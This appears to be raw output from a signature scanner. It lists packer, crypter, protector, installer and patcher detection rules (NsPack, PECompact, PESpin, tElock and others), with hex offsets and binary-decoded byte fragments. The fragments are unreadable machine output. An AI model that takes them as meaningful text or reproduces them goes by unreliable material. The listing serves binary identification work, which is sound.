0 0x16e64d MSLRH_0_32a_fake_WWPack32_1_x_Detecton_1 SU3` WWPack32 decompression routine version 1.12 (c) 1998 Piotr Warezak and R None $1
0 0x16ed5c MSLRH_0_32a_fake_yoda_s_cryptor_1_2_Detecton_1 `] @{ ; @,xba@ tuP None $1
0 0x157927 MSLRH_v0_1_Detecton_1 `@ tu tu None $1
1 0x16267b 0x1626d0 MSLRH_v0_31a_Detecton_1 `֨Бsʇهχ None $1
0 0x1626d0 MSLRH_v0_31a_Detecton_Number_2 `֨БsʇهχǑ  ʇˇ/5ц5ȆʇӳˇD@ None $1
1 0x15c466 0x15c4bb MSLRH_v0_32a_Detecton_1 tutu1P1 +$tu None $1
0 0x15c4bb MSLRH_v0_32a_Detecton_Number_2 tutu1P1 +$tu =h vh ftufdtu None $1
0 0x157a47 MSLRH_v0_32a_Detecton_Number_3 @ tu tuP)ZXk None $1
0 0x157a47 MSLRH_v32a_Detecton_Number_2 @ tu tuP)ZXk)ZXtu1P1 +$tu =h vh ftufd tu1P1 +$tu =h vh ftufdtututu1P1 +$tu =h vh ftufdtu None $1
0 0x157a47 MSLRH_v32a_Detecton_Number_3 @ tu tuP)ZXk)ZXtu1P1 +$tu =h vh ftufd tu1P1 +$tu =h vh ftufdtututu1P1 +$tu =h vh ftufdtu None $1
0 0x157927 MSLRH_Detecton_Number_2 `@ tu tu tu1P1 +$tu =h vh ftufd tu1P1 +$tu None $1
0 0x18f73c MSVC_v_8_procedure_1_recognized_h_Detecton_1 UeeSWN@;ǻt t У`VEPu3u333EPE3E3;uO@ u 5։5^_[ None $1
0 0x15f577 NakedPacker_1_0_Detecton_Number_2 `4u1P+008P4=Pua%8at$jDP@t$jDPHËL$Vt$Wt T$ None $1
0 0x16f3ec nBinder_v3_6_1_Detecton_1 n5645653234543_nb3\\n5645653234543_nb3\ None $1
0 0x1647cd nBinder_v4_0_Detecton_1 \nb4_tmp_0132454350\UCL0w,aQ mjp5c飕d2y None $1
0 0x16b956 nMacro_recorder_1_0_Detecton_1 \nmr_temp.nmrrbXAAFF5A None $1
1 0x167c2c 0x17ebd9 NoodleCrypt_2_00_Eng_Detecton_1 ve}UC=,% None $1
2 0x156bf0 0x167c5c 0x17ec09 NoodleCrypt_v2_0_Detecton_Number_2 =, None $1
0 0x156c0a NoodleCrypt_v2_0_Detecton_Number_2  None $1
1 0x167c2c 0x17ebd9 NoodleCrypt_v2_0_Detecton_Number_2 ve} None $1
1 0x167c34 0x17ebe1 NoodleCrypt_v2_0_Detecton_Number_2 e}U None $1
1 0x167c3c 0x17ebe9 NoodleCrypt_v2_0_Detecton_Number_2 }UC None $1
1 0x167c44 0x17ebf1 NoodleCrypt_v2_0_Detecton_Number_2 UC None $1
1 0x167c54 0x17ec01 NoodleCrypt_v2_0_Detecton_Number_2 = None $1
0 0x17ec21 NoodleCrypt_v2_0_Detecton_Number_2 % None $1
1 0x1602a4 0x174398 North_Star_PE_Shrinker_1_3_Detecton_2 `]@-@+荵stՋO+ЉOg None $1
0 0x174398 North_Star_PE_Shrinker_v1_3_Detecton_3 `]@-@+荵stՋO+ЉOg6`j@hhjc[1@.@PS=aG߃?u ;;t-3{WQRSVWc[ZY_thjc None $1
0 0x174b31 Norton_Speed_Disk_Configuration_file_Detecton_1 Norton Speed None $1
1 0x16c5c1 0x18ecf0 nPack_1_1_250_2006_Beta_Detecton_1 =uFs.+5 None $1
0 0x17eff3 NSPack_Detecton_1 t(CVQSRV3sCPZ[Y^ a >u~u None $1
0 0x159b3d NsPacK_Net_Detecton_1 VirtualProtectGetSystemInfoKERNEL32.dll^_CorMainmscoree.dll None $1
2 0x153569 0x174436 0x184172 NsPack_1_4_Detecton_2 ߃?u ;;t-3{WQRS None $1
1 0x15d43a 0x15d48f NsPack_2_3_Detecton_1 `]+荵tKՋ+Љ6 None $1
1 0x16cfe5 0x16d03a NsPack_3_1_Detecton_1 `]<t<B+`j@hhj None $1
0 0x1870d4 NsPack_3_1_Detecton_1 `]<t<B+`j@hhj None $1
1 0x16cfe5 0x16d03a NsPack_3_1_Detecton_Number_2 `]<t<B+`j@hhj None $1
0 0x15d29a nSpack_V2_3_Detecton_1 `pack$@ None $1
0 0x15d48f NsPack_v2_3_Detecton_1 `]+荵tKՋ+Љ6`j@hhjV[TPSa None $1
7 0x1569d7 0x15a5cb 0x15bcb3 0x15d37c 0x15d43a 0x15d48f 0x17be63 0x1910f8 nSpack_V2_x_Detecton_1 `]+荵 None $1
0 0x15aeeb NsPack_V2_X_Detecton_1 nspack$@ None $1
0 0x18e940 NTkrnl_Secure_Suite_Detecton_1 h)CâaNǦYnML6FnE.AYP9bMa$zfkR~F None $1
1 0x17512a 0x18a87e NTkrnl_Secure_Suite_Detecton_Number_3 4(APKernel32.dllLoadLibraryAGetProcAddressy None $1
0 0x15d7d2 NTkrnl_Secure_Suite_V0_1_Detecton_1 4(Kernel32.dllLoadLibraryAGetProcAddressh None $1
0 0x15554b NTkrnl_Secure_Suite_V0_1_DLL_Detecton_1 4(Kernel32.dllLoadLibraryAGetProcAddressD$P None $1
0 0x16935e NTKrnlPacker_Detecton_1 4(APKernel32.dllLoadLibraryAGet None $1
0 0x1659d5 NTPacker_V2_X_Detecton_1 KWindowsUTypes?untMainFunctionsGuntBypassaPLibu None $1
0 0x16d5cf Nullsoft_Install_System_1_xx_Detecton_Number_2 SVW q@`AD$ (p@h(q@PVq@=`A"uaA=q@t:t None $1
1 0x16f4e9 0x17d3ff Nullsoft_Install_System_2_0_RC2_Detecton_1 SUVWD$p@3D$ ,p@Ur@TCVWBp@ p@u!hV\q@ None $1
0 0x186396 Nullsoft_Install_System_2_06_Detecton_1 SUV3W\$D$D$ Shh#V None $1
1 0x1665b1 0x1878dd Nullsoft_Install_System_2_0_Detecton_1 SUVWD$p@3D$ ,p@Sr@TCVWBp@-p@u!hV\q@ None $1
1 0x16ea41 0x1844cd Nullsoft_Install_System_2_0a0_Detecton_1 SVW@AD$ (@h@PV@=A"uA=@t:t None $1
1 0x16c822 0x17aa31 Nullsoft_Install_System_2_0b4_Detecton_1 SUVWD$@3D$ ,p@Ur@BVW`oBp@ p@u!hV`q@ None $1
0 0x16c877 Nullsoft_Install_System_2_0b4_Detecton_Number_2 d$SUVWD$ 0p@ zVUp@V}+ p@jVӿyVW&u8h@UV`q None $1
0 0x17d3ff Nullsoft_Install_System_v2_0_RC2_Detecton_1 SUVWD$p@3D$ ,p@Ur@TCVWBp@ p@u!hV\q@hh@VjY BVhp@h\@V(Wp@@CPVp@jDq@=@C" Bu D$"@C=r@ :L$t P׊uP׋t$ V׋> t>/uDF>Su F < u>NCR None $1
0 0x1878dd Nullsoft_Install_System_v2_0_Detecton_1 SUVWD$p@3D$ ,p@Sr@TCVWBp@-p@u!hV\q@hh@VjW BVhp@h\@V(Wp@@CPVp@jDq@=@C" Bu D$"@Ct$V#Pq@|$a u@8 t8"D$ u@D$"8/u1@8SuH u None $1
0 0x1844cd Nullsoft_Install_System_v2_0a0_Detecton_1 SVW@AD$ (@h@PV@=A"uA=@t:t V׋u> None $1
0 0x17aa31 Nullsoft_Install_System_v2_0b4_Detecton_1 SUVWD$@3D$ ,p@Ur@BVW`oBp@ p@u!hV`q@h@V|YfBVhp@hؑ@V'Wp@BPVp@jDq@=B"nBu D$"B=r@ :L$t P׊uP׋t$ V׋> t>/uDF>Su F < u>NCR None $1
1 0x16a9d6 0x17e328 Nullsoft_PiMP_Install_System_1_x_Detecton_1 SVW@D$ (@h@PV@="u=@t:t None $1
0 0x16d5cf Nullsoft_PiMP_Install_System_1_x_Detecton_1 SVW q@`AD$ (p@h(q@PVq@=`A"uaA=q@t:t None $1
1 0x16ea41 0x1844cd Nullsoft_PiMP_Install_System_1_x_Detecton_1 SVW@AD$ (@h@PV@=A"uA=@t:t None $1
0 0x195c29 Nullsoft_PiMP_Install_System_1_x_Detecton_1 SVW@D$ (@h@PV@="u=@t:t None $1
0 0x17e328 Nullsoft_PiMP_Install_System_v1_x_Detecton_1 SVW@D$ (@h@PV@="u=@t:t V׋u>tV׋t$>/ None $1
1 0x15d685 0x15d6da Obsidium_1_3_0_0_Detecton_1 %4):T$ 2"3e~yEe dg6 dg&hk None $1
1 0x15b5c4 0x15b618 Obsidium_1_3_0_4_Detecton_1 %T$ #3dg6dg&P3 None $1
1 0x165d56 0x17c916 ORiEN_2_11_DEMO_Detecton_1 ] -------------------------------------------- - ORiEN executable files pro None $1
1 0x165d56 0x17c916 ORiEN_2_11_2_12_Detecton_1 ] -------------------------------------------- - ORiEN executable files pro None $1
1 0x16ade4 0x18063b ORiEN_2_11_2_12_Detecton_1 ] -------------------------------------------- - ORiEN executable files pro None $1
2 0x16a6d8 0x17c951 0x180676 ORiEN_V1_X_V2_X_Detecton_1 ORiEN executable files protection system None $1
0 0x15fccc PackItBitch_1_0_Detecton_1 (5KERNEL32.DLLAPLoadLibraryAGetProcAddressy} None $1
0 0x15fccc PackItBitch_V1_0_Detecton_1 (5KERNEL32.DLLAPLoadLibraryAGetProcAddressy} None $1
0 0x16c53c PackItBitch_V1_0_Detecton_1 KERNEL32.DLLLoadLibraryAGetProcAddress None $1
0 0x182358 Packman_0_0_0_1_Detecton_Number_2 =F PUV6 usˍIPQPUXu^~u t4*p@33f.fu MFF;u܋8uauF None $1
1 0x1803b7 0x182dca Patch_Creation_Wizard_1_2_Byte_Patch_Detecton_1 j$3@jh)@jjP,jUVQWE =j53@Pjhu None $1
1 0x18124a 0x18d6f5 Patch_Creation_Wizard_1_2_Memory_Patch_Detecton_1 jz3@jh@jjPhZ1@h1@jjjjjjh0@jQt15b1@jj0b  None $1
0 0x1722f0 Patch_Creation_Wizard_1_2_Seek_and_Destroy_Patch_Detecton_1 j^9@jh)@jjPrj/UVQWE =j59@aPjhu None $1
0 0x182dca Patch_Creation_Wizard_v1_2_Byte_Patch_Detecton_1 j$3@jh)@jjP,jUVQWE =j53@Pjhu h_0@jeuh0@jguh1@jfuju3@3@,3@3@h3@jj53@3@3@0@3@h3@jj53@e_T None $1
0 0x18d6f5 Patch_Creation_Wizard_v1_2_Memory_Patch_Detecton_1 jz3@jh@jjPhZ1@h1@jjjjjjh0@jQt15b1@jj0b 5Z1@"5^1@Sj"jh0@h0@jcjUVQWE =ukj5z3@8Pjhu4h0@jeu+hQ0@jgu h0@jfu E~3@h;@hh None $1
0 0x1722f0 Patch_Creation_Wizard_v1_2_Seek_and_Destroy_Patch_Detecton_1 j^9@jh)@jjPrj/UVQWE =j59@aPjhuch_0@jeuZh0@jguKh1@jfu<ju9@9@,9@9@h9@jj59@9@9@0@9@h9@jj59@_T None $1
0 0x154913 PAV_Cryptor_Pawning_AntiVirus_Cryptor_Detecton_1 SVWU,p0p p{(u?t3҉Ճ?u=0ptT0p{(u >u3C  0p{(v>t"Ct0pSB;Bt tP 0p{(uS${(t5;u=ptpPV ^s]_^[ã0p&Ð0p None $1
1 0x1532a5 0x18146d PC_Guard_for_Win32_5_00_Detecton_1 UP]` X5@6 a` XH@5a+՝ X` None $1
1 0x1663b7 0x178377 PC_Guard_for_Win32_5_00_Detecton_1 UP]` X5@6 a0@` XH@5a+՝ X` None $1
1 0x1663b7 0x178377 PC_Guard_5_00d_Detecton_1 UP]` X5@6 a0@` XH@5a+՝ X` None $1
0 0x173d70 PCIENC_Cryptor_Detecton_1 PCIEN None $1
0 0x17f538 PDS_graphics_file_format_Detecton_1 IMAGEIDENTIFIER None $1
5 0x15cf93 0x164083 0x16ad54 0x16d250 0x17a6be 0x186f5d PE_Crypt_v1_02_Detecton_1 [RND None $1
1 0x153df1 0x18cdc5 PE_Protect_0_9_Detecton_1 PE-PROTECT 0.9 (C)o None $1
1 0x15989e 0x191c6c PE_Spin_0_b_Detecton_1 h` $+K,$rF tuǁsz/swCkhr]3A&Z3 None $1
25 0xf92a8 0x157758 0x15989e 0x15fbb5 0x1614db 0x161530 0x163bd5 0x163bf3 0x165dd3 0x165e94 0x16879a 0x16b511 0x16fc5b 0x17416f 0x17af80 0x17b323 0x17da0f 0x17ed2c 0x181806 0x18460a 0x187b96 0x189256 0x191c6c 0x1926ec 0x194848 0x194b8a PE_Spin_v0_4x_Detecton_1 h` None $1
0 0x1536ee PE_Armor_0_460_0_759_Detecton_Number_2 KERNEL32.dllGetProcAddressGetModuleHandleALoadLibraryA None $1
0 0x17f180 PE_Armor_0_460_0_759_Detecton_Number_2 ^NKERNEL32.dllGetProcAddressGetModuleHandleALoadLibraryA None $1
0 0x17fee0 PE_Armor_0_460_0_759_Detecton_Number_2 tKERNEL32.dllGetProcAddressGetModuleHandleALoadLibraryA None $1
0 0x16e71a PE_Armor_0_760_0_765_Detecton_1 KERNEL32.dllGetProcAddressLoadLibraryAGetModuleHandleA` None $1
0 0x17fde6 PE_Armor_0_760_0_765_Detecton_1 KERNEL32.dllGetProcAddressLoadLibraryAGetModuleHandleA` None $1
1 0x15e1a0 0x18d80c PE_PaCK_1_0_Detecton_1 -= PE-PACK v1.0 -- (C) Cop None $1
0 0x18d80c PE_PaCK_v1_0_Detecton_1 -= PE-PACK v1.0 -- (C) Copyright 1998 by ANAKiN =- None $1
1 0x153e33 0x18ce07 PE_Protect_0_9_Detecton_Number_2 PE-PROTECT 0.9 None $1
1 0x156fce 0x19528b Pe123_2006_4_12_Detecton_1 `SrP [ËXËU`M} ua] XËXË None $1
1 0x16cf02 0x1928b2 Pe123_2006_4_4_Detecton_1 4`*=##J[Í@Sl~Pg[ËXËU`M None $1
0 0x16c018 PEBundle_v3_10_Detecton_1 `3ă[ @@ None $1
1 0x1907d4 0x190824 PEBundle_v3_10_Detecton_1 `3ă[ @$@ None $1
0 0x190874 PEBundle_v3_10_Detecton_1 `3ă[ @B$@ None $1
1 0x1542ef 0x1794cd PECompact_2_00_alpha_38_Detecton_1 tzƀUSQWRVSj@hsjKʋЋP3SK ʍs None $1
0 0x177309 PECompact_2_0beta_student_version_Detecton_1 Pd5d% None $1
0 0x1723ef PECompact_2_x_Detecton_1 Pd5d%3PECompact2 None $1
58 0x155aba 0x156123 0x159dce 0x15a57b 0x15a5a3 0x15af3d 0x15b01c 0x15b044 0x15b0a7 0x15b0e8 0x15ceb5 0x160336 0x162919 0x16309a 0x164def 0x164e6e 0x165cdd 0x165dab 0x166310 0x166455 0x166f4d 0x166fc0 0x16802c 0x168e4f 0x1694f6 0x16b566 0x16c78b 0x16c9a5 0x16c9f3 0x16d691 0x16fed7 0x170101 0x170129 0x177a45 0x177a95 0x1782a4 0x17dc31 0x17dc81 0x17f34c 0x184544 0x1850f5 0x185145 0x189b0c 0x18c2f8 0x18e52c 0x18eef9 0x19150c 0x19155c 0x1915ac 0x1915fc 0x19164c 0x19169c 0x1916ec 0x19173c 0x192215 0x1933f7 0x193447 0x1949d2 0x196c60 PECompact_v1_4x_Detecton_1 hÜ`3ă[ None $1
1 0x1634b1 0x180487 PECompact_v1_4x_Detecton_1 h@Ü`3ă[ None $1
0 0x165653 PECompact_v1_4x_Detecton_1 hÜ`3ă[ None $1
0 0x168435 PECompact_v1_4x_Detecton_1 h.Ü`3ă[ None $1
0 0x16c67d PECompact_v1_4x_Detecton_1 hÜ`3ă[ None $1
0 0x1794cd PECompact_v2_00_alpha_38_Detecton_1 tzƀUSQWRVSj@hsjKʋЋP3SK ʍsPWVXCSF+VKN׉^Z_Y[] None $1
4 0x1614b8 0x16b00c 0x16cead 0x178cff 0x18aa83 PECompact_v2_xx_Detecton_1 Pd5d%3PECompact2 None $1
0 0x1681cf PeCompact2_2_53_2_76_Detecton_1 USQWVRSRj@hsjKʋZPR3C ‹K C ‹K K ʍC PWV None $1
0 0x18e44b Pelles_C_2_90_EXE_X86_CRT_LIB_Detecton_1 Ujhhd5d%SVWehY None $1
0 0x16d3bb Pelles_C_2_90_3_00_4_00_DLL_X86_CRT_LIB_Detecton_1 USVW] uu=u1tut None $1
0 0x155313 Pelles_C_3_00_4_00_4_50_EXE_X86_CRT_DLL_Detecton_1 Ujhhd5d%SVWeEhY None $1
0 0x160ebf Pelles_C_3_00_4_00_4_50_EXE_X86_CRT_LIB_Detecton_1 Ujhhd5d%SVWehY None $1
0 0x15dc3b Pelles_C_4_50_DLL_X86_CRT_LIB_Detecton_1 USVW] uu =u1Wtu None $1
1 0x15eff8 0x17cdac PEQuake_0_06_Detecton_1 -=-J[nkErNeL32.dLlGetProcAd None $1
1 0x15eff8 0x17cdac PEQuake_0_06_Detecton_Number_2 -=-J[nkErNeL32.dLlGetProcAddressGetModuleHandleALoadLibraryAVirtualAlloc None $1
0 0x17cdac PEQuake_v0_06_Detecton_3 -=-J[nkErNeL32.dLlGetProcAddressGetModuleHandleALoadLibraryAVirtualAlloc]u=VU1VPU-jhhjP}PSZU`t$$|$(3 None $1
0 0x15ec59 PerlApp_6_0_2_Detecton_1 h,@Ӄ j Wh @Ӄ uG P @YAUjWh@Ӄ uGP @YD$3j Wh@Ӄ t"jWh@Ӄ tj Wh@Ӄ uU None $1
0 0x15ece3 PerlApp_6_0_2_Detecton_Number_2 h@@YtP @YEubjEu EPEPEPօYEuux@h@uP None $1
1 0x1614db 0x161530 PESpin_0_1_Detecton_1 h` $+K,$\F tuǁsz/swCkhr]3A None $1
2 0x163bf3 0x165e94 0x18460a PESpin_0_3_Detecton_1 h` $+K,$F tuǁsz/swCkhr]3A None $1
2 0x157758 0x17b323 0x17da0f PESpin_0_7_Detecton_1 h` $+K,$F tuǁsz/swCkhr]3A None $1
1 0x17af80 0x189256 PESpin_1_0_Detecton_1 h` $+K,$F tuǁsz/swCkhr]3A None $1
2 0x16fc5b 0x181806 0x1926ec PESpin_1_1_Detecton_1 h` $+K,$}F tuǁsz/swCkhr]3A None $1
1 0x16b511 0x17ed2c PESPin_1_3_Detecton_1 h` $+K,$F tuǁsz/swCkhr]3A None $1
2 0x16879a 0x17416f 0x194b8a PESpin_1_304_Detecton_1 h` $+K,$F tuǁsz/swCk None $1
1 0x165dd3 0x187b96 PESpin_1_3beta_Detecton_1 h` $+K,$qF tuǁsz/swCkhr]3A None $1
1 0x181806 0x1926ec PESpin_v1_1_Detecton_3 h` $+K,$}F tuǁsz/swCkhr]3A Z K@B<‰K@wrs$srrrh$4$A $ ;YڋK@SI@qL@Oi0 9I None $1
0 0x16785f PEStubOEP_v1_x_Detecton_1 @H@H`3 None $1
0 0x168aa6 PeStubOEP_v1_x_Detecton_1 33Ҹ None $1
0 0x168ab2 PeStubOEP_v1_x_Detecton_Number_2 3@H None $1
2 0x15aa16 0x1694d2 0x182ff1 Petite_1_3_Detecton_3 f`P܋ None $1
3 0x15a9ee 0x16d7de 0x18a240 0x18ca84 Petite_1_4_Detecton_3 f`PhTjP None $1
2 0x15821c 0x16234a 0x190a36 Petite_2_1_Detecton_1 d5d%f`P None $1
1 0x16efbf 0x17490c PeX_0_99_Eng_Detecton_1 None $1
1 0x15acf6 0x1843ce PEZip_1_0_Detecton_1 t#PQRSD$PUVW"UfȰ]wRvrZ`]GBAPfX%Q None $1
0 0x1843ce PEZip_v1_0_Detecton_1 t#PQRSD$PUVW"UfȰ]wRvrZ`]GBAPfX%Qf=`GP@XY|Stx[f RWwx_ZPXPX<z=ڬsq~{Sft[<$Qf0 Sf[Uj]YSUQfY]["z?yqRfnZQ None $1
0 0x17b227 Phonebook_configuration_file_Version_v3_v4_Detecton_1 Phonebookco None $1
0 0x17b227 Phonebook_configuration_file_Version_v3_v4_Detecton_Number_2 Phonebookco None $1
0 0x16e5ee Pi_Cryptor_1_0_Detecton_Number_4 U$U22ŠЈFEUE;~CMuZYYdhE None $1
0 0x174497 PKLITE32_v1_1_Detecton_Number_2 Ut ] E WVS] None $1
0 0x163fee PolyBox_D_Detecton_1 U3QQQQQS3Uh,@d0d EF@$j$F@ F@F@qn F@Ã$F@;F@QEF@E,@ None $1
0 0x15742d PolyCrypt_PE_2_1_4b_2_1_5_Detecton_1 ɀ4` None $1
0 0x166f8f PolyCrypt_PE_2_1_4b_2_1_5_Detecton_Number_2 PolyCrypt PE (c) 2004-2005, JLabSoftware.PCPE None $1
0 0x16a0c1 PolyEnE_V0_01_Detecton_1 PolyEnEMessageBoxAUSER32.dll None $1
1 0x154b0f 0x17d65b PrincessSandy_1_0_eMiNENCE_Process_Patcher_Patch_Detecton_1 h'@<jA @X<CK|?.LOAt (Iu_  @  @hL @h None $1
0 0x17d65b PrincessSandy_v1_0_eMiNENCE_Process_Patcher_Patch_Detecton_1 h'@<jA @X<CK|?.LOAt (Iu_  @  @hL @h @jjj jjjWjtxP= @<= @MtW`jQh\ @S5L @at`\ @ta`jPWS5L @zt a<t-머^!@|!@ !@!@jhV None $1
0 0x168c96 Private_EXE_Protector_1_8_Detecton_1 ms1ds 1[s#AOsu?M)uB(tM H,=}s swAAV)^uF1Ar11 None $1
0 0x166ed4 Private_EXE_Protector_1_8_Detecton_2 vЍؐ None $1
0 0x16bb3d Private_EXE_Protector_1_9_7_Detecton_1 USWVt$ |$$f>JC 3ۺD$C$us,L$3$ None $1
0 0x16bb3d Private_EXE_Protector_1_9_7_Detecton_Number_2 USWVt$ |$$f>JC 3ۺD$C$us,L$3$uIuD$ Gunu3$d$uIuHtusB3$uIuGMu None $1
0 0x166066 Private_exe_Protector_V1_8X_V1_9X_Detecton_1 KERNEL32.DLLExitProcess None $1
1 0x15e57d 0x16c540 Private_exe_Protector_V2_0_Detecton_1 KERNEL32.DLL None $1
3 0x16b98a 0x16b9b6 0x182a43 0x18f965 Private_EXE_v2_0a_Detecton_Number_2 S[- None $1
0 0x1905ff PRO_MIDI_Music_file_Detecton_1 RIFFRMID None $1
1 0x16a320 0x18617e Protect_Shareware_1_1_Detecton_1 StringFileInfo040904B04CompanyName None $1
0 0x18617e Protect_Shareware_V1_1_Detecton_1 StringFileInfo040904B04CompanyNameJvw None $1
0 0x17f135 PS_AdobeFont_v_1_0_Detecton_1 %!PS-AdobeFont-1.0: None $1
1 0x167ed8 0x167f2d PUNiSHER_1_5_DEMO_Detecton_1 `,$Adk]dk,$dkAdk)$dkdk None $1
0 0x16b7c1 PUNiSHER_V1_5_Detecton_1 ?f ~ KERNEL32 None $1
1 0x168583 0x188c47 R_SC_s_Process_Patcher_1_4_Detecton_1 8"u8t.8 ux"t@8t@x u8t @8t8"t`@h @ @Dh None $1
1 0x164939 0x171681 R_SC_s_Process_Patcher_1_5_1_Detecton_1 h @8t fx" u@`@h @h @jjjjjjWP9`@(!@ None $1
0 0x188c47 R_SC_s_Process_Patcher_v1_4_Detecton_1 8"u8t.8 ux"t@8t@x u8t @8t8"t`@h @ @Dh @h @jjjjjjWP|*`@ "@@`@~>r!sc3f ύ~!@!@P "@9!@X`jSh @Q5 @a` @au None $1
0 0x171681 R_SC_s_Process_Patcher_v1_5_1_Detecton_1 h @8t fx" u@`@h @h @jjjjjjWP9`@(!@@~>r!sctz ύ~$!@$!@P(!@9$!@X`jSh,!@Q5 @ a`,!@au`>jSWQ5 @aq`5 @a None $1
0 0x18758d RAR_Configuration_file_Detecton_1 RAR CONFIG None $1
0 0x15808f RatPacker_Glue_stub_Detecton_Number_2 @ `@ None $1
1 0x15664c 0x156659 RCryptor_v1_1_Detecton_1 $Oh None $1
0 0x156659 RCryptor_v1_1_Detecton_Number_2 $Ohи=t0@ None $1
1 0x159cd5 0x17a46e RLP_0_7_3beta_Detecton_1 `]2B1@A0@+3Ҋ@0@Iud=0KR\Lw ΈN-] ^V None $1
0 0x15e981 RLP_V0_7_3_beta_Detecton_1 .rlpP None $1
0 0x17a46e RLP_v0_7_3beta_Detecton_1 `]2B1@A0@+3Ҋ@0@Iud=0KR\Lw ΈN-] ^VA@hKq@<@@up@@Cď+J0*5K4tt2E < 6~ZQcf0X ̅S H(\&\Z t~3N)V+Bvd{p :ǵ>p None $1
0 0x176e25 RLPack_1_16_aPLib_compression_Detecton_1 `,$S3Et747Ӄ<7ut7Sj@hhjO[OVӃO@8u@8KVG[Kt5PK KGtk None $1
0 0x1766d8 RLPack_1_16_LZMA_compression_Detecton_1 `,$Z @3j@hh j : `: 47t7a<7ut7Sj@hhj V [`: VV aV @8u@8R V N  None $1
0 0x15ab51 RosAsm_2050a_Detecton_1 U`]$0<9vhhhja] None $1
2 0x154c60 0x17948f 0x18d4c9 Safe_2_0_Detecton_1 SVW None $1
1 0x15ff65 0x173942 SafeDisc_4_Detecton_1 BoG_ None $1
0 0x18bdd9 SafeDisc_SafeCast_2_xx_3_xx_Detecton_1 U`3Ɋ =t +ÃQ+AYCQh 3tEPvYt None $1
3 0x153ce0 0x1630e0 0x163135 0x1676e4 SDProtect_Detecton_Number_2 Ujh 2hdPd%XdXXXX;XS None $1
1 0x15b7bb 0x192bbb SDProtect_Detecton_Number_2 Ujh 2hdPd%XdXXXXPdd5 None $1
0 0x17989b SDProtect_Detecton_Number_2 UjhhdPd%XdXXXX None $1
1 0x1630e0 0x163135 SDProtector_Pro_Edition_1_16_Detecton_Number_2 Ujh 2hdPd%XdXXXX;XSQL$UA3AA None $1
1 0x15ea42 0x1800c3 Sentinel_SuperPro_Automatic_Protection_6_4_0_Detecton_1 hjj3= UV None $1
1 0x16df51 0x18b110 Sentinel_SuperPro_Automatic_Protection_6_4_1_Detecton_1 UtuPU UQtRjjh] None $1
1 0x153ac4 0x18e7fa Setup_Factory_6_0_0_3_Setup_Launcher_Detecton_1 Ujha@hp;@dPd%XSVWea@3Ҋԉ\@ȁ X@ʉ T@P None $1
0 0x18e7fa Setup_Factory_v6_0_0_3_Setup_Launcher_Detecton_1 Ujha@hp;@dPd%XSVWea@3Ҋԉ\@ȁ X@ʉ T@P@3VYuj Yua@@@@M "uЍEP a@ EEtEj XPuVVa@PZEPE None $1
0 0x165d05 Setup2Go_Installer_Stub_Detecton_1 [SETUP_INFO] Ver None $1
0 0x17d3ef Sharp_GPB_Graphics_format_Detecton_1 M None $1
0 0x16b4e9 Shrinker_3_2_Detecton_1 UVWueh None $1
0 0x1658cf Shrinker_3_3_Detecton_1 UVWueh None $1
0 0x16b4fd Shrinker_3_4_Detecton_1 UVWukh  None $1
1 0x165a10 0x180d80 Silicon_Realms_Install_Stub_Detecton_1 Ujh@h@dPd%XSVWe@3Ҋԉ@ȁ @ʉ @ None $1
0 0x176361 Silicon_Realms_Install_Stub_Detecton_1 UjhP@hi@dPd%XSVWe@3Ҋԉ@ȁ @ʉ @ None $1
0 0x180d80 Silicon_Realms_Install_Stub_Detecton_Number_2 Ujh@h@dPd%XSVWe@3Ҋԉ@ȁ @ʉ @@3VYuj Yu@@@uЍEP@EEtEj XPuVV@PEPE MPQYYËeu=@u None $1
0 0x164826 SimplePack_1_2_build_30_09_Method2_Detecton_1 MZRPEL   None $1
0 0x16d6d2 SimplePack_1_21_build_09_09_Method2_Detecton_1 MZRPEL   None $1
2 0x164826 0x16635b 0x16d6d2 SimplePack_1_X_Method2_Detecton_1 MZRPEL   None $1
0 0x16bdf0 SimplePack_1_X_Method2_Detecton_1 MZRPEL   None $1
2 0x15c440 0x16635b 0x172d25 SimplePack_V1_1X_Method2_Detecton_1 MZRPEL None $1
0 0x16635b SimplePack_V1_1X_Method2_Detecton_Number_2 MZRPEL   None $1
0 0x16635b SimplePack_V1_1X_Method2_Detecton_Number_3 MZRPEL   None $1
2 0x1639a2 0x16c342 0x18df46 SLVc0deProtector_0_60_Detecton_1 IiIOhIg1x None $1
1 0x166606 0x180772 SLVc0deProtector_1_1_Detecton_1 ]i_@@󍕃@+ƒBiiQ@X2 None $1
0 0x180772 SLVc0deProtector_v1_1_Detecton_Number_2 ]i_@@󍕃@+ƒBiiQ@X2Y޷$ zjGlZle9T=$Lct,c kycx0/+5E6 }$Q<4ZC$t0 None $1
1 0x17213f 0x181650 Soft_Defender_v1_12_Detecton_1 tu2gtu h9DYPt uYUVWSxy 4GI4314RG#hGYXtu None $1
0 0x167c81 SoftComp_1_x_Detecton_1 ,$:A],$1*A)$$*AX*A None $1
0 0x152e37 SPLayer_v0_08_Detecton_1 @jX Hf; None $1
0 0x160cd8 ST_Protector_V1_5_Detecton_1 KeRnEl32.dLlGetProcAddressLoadLibraryA None $1
0 0x18245f Sun_Icon_Graphics_format_Detecton_1 /* Format_version=1, None $1
1 0x161972 0x1736f0 SVK_Protector_1_32_Eng_Detecton_1 `]6Bd#DŽDŽugIVDF^UQjV aY]@u<> None $1
1 0x158dcd 0x16d11f SVK_Protector_1_3x_Eng_Detecton_1 `]Bd#DŽDŽugIVDF^UQjV aY]@u<> None $1
1 0x161972 0x1736f0 SVK_Protector_1_3x_Eng_Detecton_1 `]6Bd#DŽDŽugIVDF^UQjV aY]@u<> None $1
0 0x17c431 SVK_Protector_v1_43_Detecton_1 xNL<xNV{\P ` None $1
0 0x182b89 Symantec_WinFax_PRO_7_5_Coverpage_Detecton_1  None $1
0 0x1839c8 Symantec_WinFax_PRO_8_3_Coverpage_Quick_CoverPage_Detecton_1 CoverDatabase None $1
0 0x1839dc Symantec_WinFax_PRO_8_3_Coverpage_Detecton_1 l None $1
1 0x1621d4 0x184fc5 tElock_0_98_Detecton_Number_2 % None $1
0 0x162370 tElock_0_98_Detecton_Number_2 % >.&K6Vi None $1
1 0x16bcb5 0x16bd0a tElock_0_99_Special_Build_Detecton_1 ^ 0 None $1
2 0x17c66c 0x189fdb 0x19060b tElock_0_99_Detecton_2  None $1
0 0x173614 The_Norton_Antivirus_Information_file_Detecton_1 The Norton AntiVirus Information File None $1
1 0x160f9c 0x18ae62 TheHyper_s_protector_Detecton_1 U^ kernel32.dllF VirtualAllocS None $1
